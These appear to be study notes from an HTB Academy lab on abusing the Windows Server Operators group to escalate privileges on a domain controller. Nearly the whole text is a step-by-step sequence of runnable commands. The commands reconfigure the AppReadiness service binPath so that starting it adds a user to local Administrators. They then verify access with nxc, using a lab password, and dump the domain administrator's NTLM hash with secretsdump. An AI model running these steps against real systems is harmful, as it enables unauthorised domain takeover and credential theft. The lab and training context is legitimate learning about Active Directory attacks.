Server Operators

• The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges.
  • It is a very highly privileged group that can log in locally to servers, including Domain Controllers.
• Query the AppReadiness service
  • sc.exe qc AppReadiness
  • O/P says SERVICE_START_NAME : LocalSystem
    • If it says LocalSystem, the service runs as SYSTEM. If it shows an account name (e.g., NT SERVICE\... or a user), it runs under that account instead.
• Checking Service Permissions with PsService
  • c:\Tools\PsService.exe security AppReadiness
  • 
  • This confirms that the Server Operators group has SERVICE_ALL_ACCESS access right, which gives us full control over this service.
• Checking Local Admin Group Membership
  • net localgroup Administrators
  • our target account is not present
• Modifying the Service Binary Path
  • sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
• Starting the Service
  • sc.exe start AppReadiness
  • might fail which is expected
• Confirming Local Admin Group Membership
  • net localgroup Administrator
  • our target use must be added here
• Confirming Local Admin Access on Domain Controller
  • nxc smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'
• Retrieving NTLM Password Hashes from the DC
  • secretsdump.py server_adm@10.129.43.9 -just-dc-user administrator